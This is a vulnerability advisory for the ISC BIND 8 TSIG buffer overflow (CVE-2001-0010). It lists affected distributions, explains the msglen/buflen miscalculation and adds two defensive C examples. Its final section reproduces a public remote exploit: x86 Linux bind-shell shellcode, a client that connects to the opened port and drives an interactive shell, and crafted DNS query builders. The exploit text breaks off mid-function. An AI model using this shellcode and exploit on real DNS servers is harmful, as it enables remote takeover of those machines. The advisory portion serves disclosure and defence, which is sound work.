ISC BIND 8 TSIG Remote Buffer Overflow Vulnerability

Published: 2001-01-29
Updated: 2001-01-29

Affected systems:
ISC BIND 8.2,8.2.1,8.2.2 p5,8.2.2 p6,8.
    - Caldera eDesktop 2.4
    - Caldera eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 sparc
ISC BIND 8.2.1
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 sparc
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 6.0 sparc
    - RedHat Linux 5.2 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p5
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 68k
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p6
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2 x86
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p7
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 arm
    - Debian Linux 2.2
    - Debian Linux 2.2 68k
    - Debian Linux 2.2 powerpc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2 x86
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
Unaffected systems:
ISC BIND 8.2.3
    - EnGarde Secure Linux 1.0.1
ISC BIND 9.0
    - EnGarde Secure Linux 1.0.1
    - SuSE Linux 7.0 alpha
    - SuSE Linux 7.0 sparc
    - SuSE Linux 7.0 i386
    - SuSE Linux 7.0 powerpc
Description:
BUGTRAQ ID: 2302
CVE(CAN) ID: CVE-2001-0010

BIND is server software that implements the Domain Name Service protocol, and it is widely used on the Internet.

Its implementation of TSIG (transaction signatures) contains a buffer overflow that may allow a remote attacker to execute arbitrary code on the BIND server. Because the overflow occurs during the initial processing of a DNS request, the attacker does not need to control any authoritative DNS server, and the problem affects both recursive and non-recursive DNS servers.

When a DNS request arrives, its data is placed either on the heap or on the stack, depending on the transport protocol. For a UDP datagram, the function datagram_read() reads it into a 513-byte buffer on the stack (u.buf); for a TCP stream, the function stream_getlen() reads it into a 64k buffer on the heap (sp->s_buf). BIND tracks the use of these buffers with two key variables: "msglen", which holds the actual length of the message in the buffer, and "buflen", which tracks the remaining length of the buffer. When BIND receives a DNS message, msglen is initialized to the number of bytes received from the network, and buflen is initialized to the size of the buffer used to read the message (512 bytes for UDP, 64k for TCP).

Normally, when BIND processes a request, it appends the answer records to the request, edits the DNS header to reflect the change, and sends the resulting response. Throughout this process BIND assumes that msglen plus buflen equals the original size of the buffer.

Since BIND 8.2, before processing a DNS request BIND examines the additional section of the message for a TSIG resource record, using the function ns_find_tsig(). If a valid TSIG record is found but the corresponding security key is not, BIND reports an error and bypasses the normal request-processing path. As a result, msglen and buflen both keep their initial values. BIND treats the request as an erroneous request and reuses the original request buffer, appending TSIG information after the question section. At this point BIND assumes the request buffer is still msglen + buflen bytes long. Normally that is correct; in this particular case, however, msglen + buflen is almost twice the actual buffer size! So when BIND adds the TSIG information with ns_sign(), the bytes are written beyond the end of the buffer. Because no valid key was found, ns_sign() adds only a few bytes, and their contents are limited.

This can lead to two kinds of attack. For UDP requests the buffer is on the stack, and an attacker can use some fixed values to overwrite the activation record that datagram_read() saved on the stack. On x86, overwriting the least significant byte of the saved frame pointer with 0 can make that pointer point into the original DNS request buffer; this single-byte overflow can lead to execution of arbitrary code. For TCP requests the buffer is on the heap, and an attacker can use some fixed values to overwrite boundary bytes of a malloc() allocation, so that the next boundary information is read from an attacker-controlled buffer; this can lead to a malicious pointer overwrite and, again, execution of arbitrary code.
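The msglen/buflen accounting described above, as an added model that is not BIND's code and not part of this advisory: it shows the invariant normal processing maintains, the state the TSIG error path leaves behind (msglen + buflen nearly twice the real buffer), and a bounds check that refuses an append in that state. The struct, the function names and the constructed request bytes are assumptions; the 512-byte accounting size and the initial values follow the description.

```c
/* Added example, not BIND's code: a model of the msglen/buflen accounting
 * described above.  Struct and function names are hypothetical; the 512-byte
 * UDP accounting size and the initial values follow the advisory text. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define UDP_BUFSIZE 512          /* buflen's initial value for UDP, per the description */

struct req {
    unsigned char buf[UDP_BUFSIZE];
    size_t msglen;               /* bytes of message currently in buf */
    size_t buflen;               /* bytes the accounting believes are still free */
};

/* On receipt: msglen = bytes read, buflen = the whole buffer (not the remainder). */
void req_init(struct req *r, const unsigned char *wire, size_t wirelen)
{
    memset(r, 0, sizeof *r);
    if (wirelen > UDP_BUFSIZE)
        wirelen = UDP_BUFSIZE;   /* model simplification: clamp instead of a 513th byte */
    memcpy(r->buf, wire, wirelen);
    r->msglen = wirelen;
    r->buflen = UDP_BUFSIZE;
}

/* The invariant every append relies on: msglen + buflen == real buffer size. */
int req_accounting_consistent(const struct req *r)
{
    return r->msglen + r->buflen == UDP_BUFSIZE;
}

/* Dispatch modelled on the description: normal processing rebases buflen to
 * the true remainder; the TSIG-without-key error path skips that step, so
 * both counters keep their initial values. */
void req_process(struct req *r, int tsig_present, int key_known)
{
    if (tsig_present && !key_known)
        return;                  /* error path: accounting left untouched */
    r->buflen = UDP_BUFSIZE - r->msglen;
}

/* Bounded append (the mitigation): refuse unless the accounting is
 * consistent and the bytes really fit.  Returns 1 if written, 0 if refused. */
int req_append(struct req *r, const unsigned char *data, size_t len)
{
    if (!req_accounting_consistent(r))
        return 0;
    if (len > UDP_BUFSIZE - r->msglen)
        return 0;
    memcpy(r->buf + r->msglen, data, len);
    r->msglen += len;
    r->buflen -= len;
    return 1;
}

/* Build a constructed request of wirelen bytes and run it through the model. */
static void req_run(struct req *r, size_t wirelen, int tsig_present, int key_known)
{
    unsigned char wire[UDP_BUFSIZE];
    memset(wire, 'Q', sizeof wire);           /* constructed sample request bytes */
    req_init(r, wire, wirelen);
    req_process(r, tsig_present, key_known);
}

/* Buffer size the assumption "size == msglen + buflen" yields after processing. */
size_t req_demo_assumed_bufsize(size_t wirelen, int tsig_present, int key_known)
{
    struct req r;
    req_run(&r, wirelen, tsig_present, key_known);
    return r.msglen + r.buflen;
}

/* 1 if a 16-byte trailer (standing in for ns_sign()'s few bytes) was appended
 * in bounds after processing, 0 if the bounded append refused it. */
int req_demo_append(size_t wirelen, int tsig_present, int key_known)
{
    static const unsigned char trailer[16] = {0};
    struct req r;
    req_run(&r, wirelen, tsig_present, key_known);
    return req_append(&r, trailer, sizeof trailer);
}

int main(void)
{
    printf("error path : assumed size %zu (real %d), append %s\n",
           req_demo_assumed_bufsize(400, 1, 0), UDP_BUFSIZE,
           req_demo_append(400, 1, 0) ? "written" : "refused");
    printf("normal path: assumed size %zu (real %d), append %s\n",
           req_demo_assumed_bufsize(400, 0, 0), UDP_BUFSIZE,
           req_demo_append(400, 0, 0) ? "written" : "refused");
    return 0;
}
```

For a 400-byte request the error path reports an assumed size of 912 bytes and the append is refused, while the normal path reports 512 and the trailer is written. The point for a reviewer is that an append must be checked against the buffer's real size, not against counters that a skipped code path may have left stale.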

<*Source: Anthony Osborne
        John McDonald
  
  Links: http://www.cert.org/advisories/CA-2001-02.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000377
        http://web.opennet.ru/base/netsoft/988181599_966.txt.html
        http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.13/
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.16
        http://www.debian.org/security/2001/dsa-026
        https://www.redhat.com/support/errata/RHSA-2001-007.html
        http://www.suse.com/de/support/security/2001_03_[需要添加]_txt.txt
        http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000034.html
*>
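The check the description attributes to BIND 8.2 (scanning the additional section for a TSIG resource record before normal processing), as an added stand-alone parser that is not BIND's ns_find_tsig() and not part of this advisory. A defender can run it over captured queries to flag TSIG-bearing messages that reach a server with no TSIG keys configured. The function names are hypothetical and the two sample messages are constructed here.

```c
/* Added example, not BIND's ns_find_tsig(): parse a DNS message far enough
 * to tell whether its additional section ends with a TSIG RR (type 250).
 * All names are hypothetical; the sample messages below are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define T_TSIG 250          /* RR type number for TSIG (RFC 2845), 0xfa on the wire */

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Skip a wire-format name at off; a compression pointer ends the name.
 * Returns the offset after the name, or 0 if it is malformed or runs past len. */
static size_t skip_name(const unsigned char *m, size_t len, size_t off)
{
    while (off < len) {
        unsigned char l = m[off];
        if (l == 0)
            return off + 1;
        if ((l & 0xc0) == 0xc0)
            return (off + 2 <= len) ? off + 2 : 0;
        if (l & 0xc0)
            return 0;                           /* reserved label types */
        off += 1 + l;
    }
    return 0;
}

/* Skip one RR (name, 10-byte fixed part, rdata) and store its type.
 * Returns the offset after the RR, or 0 if it is truncated. */
static size_t skip_rr(const unsigned char *m, size_t len, size_t off, uint16_t *type)
{
    uint16_t rdlen;
    off = skip_name(m, len, off);
    if (off == 0 || off + 10 > len)
        return 0;
    *type = rd16(m + off);
    rdlen = rd16(m + off + 8);
    off += 10;
    if (off + rdlen > len)
        return 0;
    return off + rdlen;
}

/* 1 if the last additional RR is TSIG (where RFC 2845 requires it), 0 if the
 * message carries no TSIG, -1 if the message is truncated or malformed. */
int dns_has_tsig(const unsigned char *m, size_t len)
{
    uint16_t qd, an, ns, ar, type = 0;
    size_t off = 12;
    int i, found = 0;
    if (len < 12)
        return -1;
    qd = rd16(m + 4); an = rd16(m + 6); ns = rd16(m + 8); ar = rd16(m + 10);
    for (i = 0; i < qd; i++) {              /* question: name + QTYPE + QCLASS */
        off = skip_name(m, len, off);
        if (off == 0 || off + 4 > len)
            return -1;
        off += 4;
    }
    for (i = 0; i < an + ns; i++)           /* answer and authority sections */
        if ((off = skip_rr(m, len, off, &type)) == 0)
            return -1;
    for (i = 0; i < ar; i++) {              /* additional section */
        if ((off = skip_rr(m, len, off, &type)) == 0)
            return -1;
        found = (type == T_TSIG);
    }
    return found;
}

/* Constructed sample: one question for example.com/A, one additional RR with
 * an empty name, type TSIG, class ANY, zero TTL and empty rdata (40 bytes). */
const unsigned char sample_with_tsig[] = {
    0xbe, 0xef, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0, 0x00, 0x01, 0x00, 0x01,
    0x00, 0x00, 0xfa, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
/* Same query, but the additional RR is an EDNS OPT record (type 41) instead. */
const unsigned char sample_with_opt[] = {
    0xbe, 0xef, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0, 0x00, 0x01, 0x00, 0x01,
    0x00, 0x00, 0x29, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

int main(void)
{
    printf("with TSIG: %d\n", dns_has_tsig(sample_with_tsig, sizeof sample_with_tsig));
    printf("with OPT : %d\n", dns_has_tsig(sample_with_opt, sizeof sample_with_opt));
    printf("truncated: %d\n", dns_has_tsig(sample_with_tsig, 30));
    return 0;
}
```

Every section walk is bounds-checked against the received length before any field is read, and a message whose counts promise more records than its bytes contain is reported as malformed rather than parsed past its end; that is the discipline the advisory's accounting bug lacked.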

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users proceed at their own risk!

Ix (adresadeforward@yahoo.com) and lucysoft (lucysoft@hotmail.com) provided the following test program:

/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
*     Ian Goldberg     <ian@cypherpunks.ca>
*     Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options.  If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
*   Ix        [adresadeforward@yahoo.com] (the master of jmpz),
*   lucysoft    [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez     - canaris
* greetz    - blizzard, netman.
* creditz    - anathema <anathema@hack.co.za> for the original shellcode
*          - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define max(a,b) ((a)>(b)?(a):(b))

#define BUFFSIZE 4096

int argevdisp1, argevdisp2;

char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far.  This needs to be lower than
* 62 in order to fit in a single Query Record.  2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
   spot first */
"\xeb\x44"                           /* jmp intr                */ // 2 - 2
/* start: */
"\x5e"                               /* popl %esi               */ // 1 - 3

  /* socket() */
"\x29\xc0"                           /* subl %eax, %eax         */ // 2 - 5
"\x89\x46\x10"                       /* movl %eax, 0x10(%esi)   */ // 3 - 8
"\x40"                               /* incl %eax               */ // 1 - 9
"\x89\xc3"                           /* movl %eax, %ebx         */ // 2 - 11
"\x89\x46\x0c"                       /* movl %eax, 0x0c(%esi)   */ // 3 - 14
"\x40"                               /* incl %eax               */ // 1 - 15
"\x89\x46\x08"                       /* movl %eax, 0x08(%esi)   */ // 3 - 18
"\x8d\x4e\x08"                       /* leal 0x08(%esi), %ecx   */ // 3 - 21
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 23
"\xcd\x80"                           /* int $0x80               */ // 2 - 25

  /* bind() */
"\x43"                               /* incl %ebx               */ // 1 - 26
"\xc6\x46\x10\x10"                   /* movb $0x10, 0x10(%esi)  */ // 4 - 30
"\x66\x89\x5e\x14"                   /* movw %bx, 0x14(%esi)    */ // 4 - 34
"\x88\x46\x08"                       /* movb %al, 0x08(%esi)    */ // 3 - 37
"\x29\xc0"                           /* subl %eax, %eax         */ // 2 - 39
"\x89\xc2"                           /* movl %eax, %edx         */ // 2 - 41
"\x89\x46\x18"                       /* movl %eax, 0x18(%esi)   */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90"                           /* movb $0x90, %al         */ // 2 - 46
"\x66\x89\x46\x16"                   /* movw %ax, 0x16(%esi)    */ // 4 - 50
"\x8d\x4e\x14"                       /* leal 0x14(%esi), %ecx   */ // 3 - 53
"\x89\x4e\x0c"                       /* movl %ecx, 0x0c(%esi)   */ // 3 - 56
"\x8d\x4e\x08"                       /* leal 0x08(%esi), %ecx   */ // 3 - 59

"\xeb\x02"                           /* jmp cont                */ // 2 - 2
/* intr: */
"\xeb\x43"                           /* jmp callz               */ // 2 - 4

/* cont: */
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 6
"\xcd\x80"                           /* int $0x80               */ // 2 - 10

  /* listen() */
"\x89\x5e\x0c"                       /* movl %ebx, 0x0c(%esi)   */ // 3 - 11
"\x43"                               /* incl %ebx               */ // 1 - 12
"\x43"                               /* incl %ebx               */ // 1 - 13
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 15
"\xcd\x80"                           /* int $0x80               */ // 2 - 17

  /* accept() */
"\x89\x56\x0c"                       /* movl %edx, 0x0c(%esi)   */ // 3 - 20
"\x89\x56\x10"                       /* movl %edx, 0x10(%esi)   */ // 3 - 23
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 25
"\x43"                               /* incl %ebx               */ // 1 - 26
"\xcd\x80"                           /* int $0x80               */ // 1 - 27

  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3"                           /* xchgb %al, %bl          */ // 2 - 29
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 31
"\x29\xc9"                           /* subl %ecx, %ecx         */ // 2 - 33
"\xcd\x80"                           /* int $0x80               */ // 2 - 35
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 37
"\x41"                               /* incl %ecx               */ // 1 - 38
"\xcd\x80"                           /* int $0x80               */ // 2 - 40
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 42
"\x41"                               /* incl %ecx               */ // 1 - 43
"\xcd\x80"                           /* int $0x80               */ // 2 - 45

  /* execve() */
"\x88\x56\x07"                       /* movb %dl, 0x07(%esi)    */ // 3 - 48
"\x89\x76\x0c"                       /* movl %esi, 0x0c(%esi)   */ // 3 - 51
"\x87\xf3"                           /* xchgl %esi, %ebx        */ // 2 - 53
"\x8d\x4b\x0c"                       /* leal 0x0c(%ebx), %ecx   */ // 3 - 56
"\xb0\x0b"                           /* movb $0x0b, %al         */ // 2 - 58
"\xcd\x80"                           /* int $0x80               */ // 2 - 60

"\x90"

/* callz: */
"\xe8\x72\xff\xff\xff"               /* call start              */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */                     // 8 - 13

unsigned long resolve_host(char* host)
{
    long res;
    struct hostent* he;

    if (0 > (res = inet_addr(host)))
    {
        if (!(he = gethostbyname(host)))
            return(0);
        res = *(unsigned long*)he->h_addr;
    }
    return(res);
}

int dumpbuf(char *buff, int len)
{
    char line[17];
    int x;

    /* print out a pretty hex dump */
    for(x=0;x<len;x++){
        if(!(x%16) && x){
            line[16] = 0;
            printf("\t%s\n", line);
        }
        printf("%02X ", (unsigned char)buff[x]);
        if(isprint((unsigned char)buff[x]))
            line[x%16]=buff[x];
        else
            line[x%16]='.';
    }
    printf("\n");
}

void
runshell(int sockd)
{
    char buff[1024];
    int fmax, ret;
    fd_set fds;

    fmax = max(fileno(stdin), sockd) + 1;
    send(sockd, "uname -a; id;\n", 15, 0);

    for(;;)
    {

        FD_ZERO(&fds);
        FD_SET(fileno(stdin), &fds);
        FD_SET(sockd, &fds);

        if(select(fmax, &fds, NULL, NULL, NULL) < 0)
        {
            exit(EXIT_FAILURE);
        }

        if(FD_ISSET(sockd, &fds))
        {
            bzero(buff, sizeof buff);
            if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
            {
                exit(EXIT_FAILURE);
            }
            if(!ret)
            {
                fprintf(stderr, "Connection closed\n");
                exit(EXIT_FAILURE);
            }
            write(fileno(stdout), buff, ret);
        }

        if(FD_ISSET(fileno(stdin), &fds))
        {
            bzero(buff, sizeof buff);
            ret = read(fileno(stdin), buff, sizeof buff);
            if(send(sockd, buff, ret, 0) != ret)
            {
                fprintf(stderr, "Transmission loss\n");
                exit(EXIT_FAILURE);
            }
        }
    }
}


connection(struct sockaddr_in host)
{
    int sockd;

    host.sin_port = htons(36864);

    printf("[*] connecting..\n");
    usleep(2000);

    if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        exit(EXIT_FAILURE);
    }

    if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
    {
        printf("[*] wait for your shell..\n");
        usleep(500);
            runshell(sockd);
    }
    else
    {
        printf("[x] error: named not vulnerable or wrong offsets used\n");
    }

    close(sockd);
}




int infoleak_qry(char* buff)
{
        HEADER* hdr;
        int n, k;
        char* ptr;
        int qry_space = 12;
        int dummy_names = 7;
        int evil_size = 0xff;

        memset(buff, 0, BUFFSIZE);
        hdr = (HEADER*)buff;

        hdr->id = htons(0xbeef);
        hdr->opcode  = IQUERY;
        hdr->rd      = 1;
        hdr->ra      = 1;
        hdr->qdcount = htons(0);
        hdr->nscount = htons(0);
        hdr->ancount = htons(1);
        hdr->arcount = htons(0);


    ptr = buff + sizeof(HEADER);
    printf("[d] HEADER is %d long\n", sizeof(HEADER));
    
    n = 62;

    for(k=0; k < dummy_names; k++)
    {
        *ptr++ = n;
        ptr += n;
    }
    ptr += 1;

        PUTSHORT(1/*ns_t_a*/, ptr);              /* type */
        PUTSHORT(T_A, ptr);                      /* class */
        PUTLONG(1, ptr);                        /* ttl */

    PUTSHORT(evil_size, ptr);            /* our *evil* size */
    
    return(ptr - buff + qry_space);
    
}



int evil_query(char* buff, int offset)
{
    int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
    HEADER* hdr;
    char *ptr;
    int k, bufflen;
    u_int n, m;
    u_short s;
    int i;
    int shelloff, shellstarted, shelldone;
    int towrite, ourpack;
    int n_dummy_rrs = 7;

    printf("[d] evil_query(buff, %08x)\n", offset);
    printf("[d] shellcode is %d long\n", sizeof(shellcode));

    shelladdr = offset - 0x200;

        lameaddr  = shelladdr + 0x300;
    
    ourpack = offset - 0x250 + 2;
    towrite = (offset & ~0xff) - ourpack - 6;
    printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));

    rroffsetidx = towrite / 70;
    offset0 = towrite - rroffsetidx * 70;

    if ((offset0 > 52) || (rroffsetidx > 6))
    {
        printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
        return(-1);
    }
        
    rrshellidx = 1;
    deplshellcode = 2;
    
    hdr = (HEADER*)buff;
    
    memset(buff, 0, BUFFSIZE);
    
    /* complete the header */
    
    hdr->id = htons(0xdead);
    hdr->opcode  = QUERY;
    hdr->rd      = 1;
    hdr->ra      = 1;
    hdr->qdcount = htons(n_dummy_rrs);
    hdr->ancount = htons(0);
    hdr->arcount = htons(1);
    
    ptr = buff + sizeof(HEADER);
    
    shellstarted = 0;
    shelldone = 0;
    shelloff = 0;
    
    n = 63;
    for (k = 0; k < n_dummy_rrs; k++)
    {
        *ptr++ = (char)n;
        
        for(i = 0; i < n-2; i++)
        {
            if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
            {
                printf("[*] injecting shellcode at %d\n", k);
                shellstarted = 1;
            }
        
            if ((k == rroffsetidx) && (i == offset0))
            {
                *ptr++ = lameaddr & 0x000000ff;
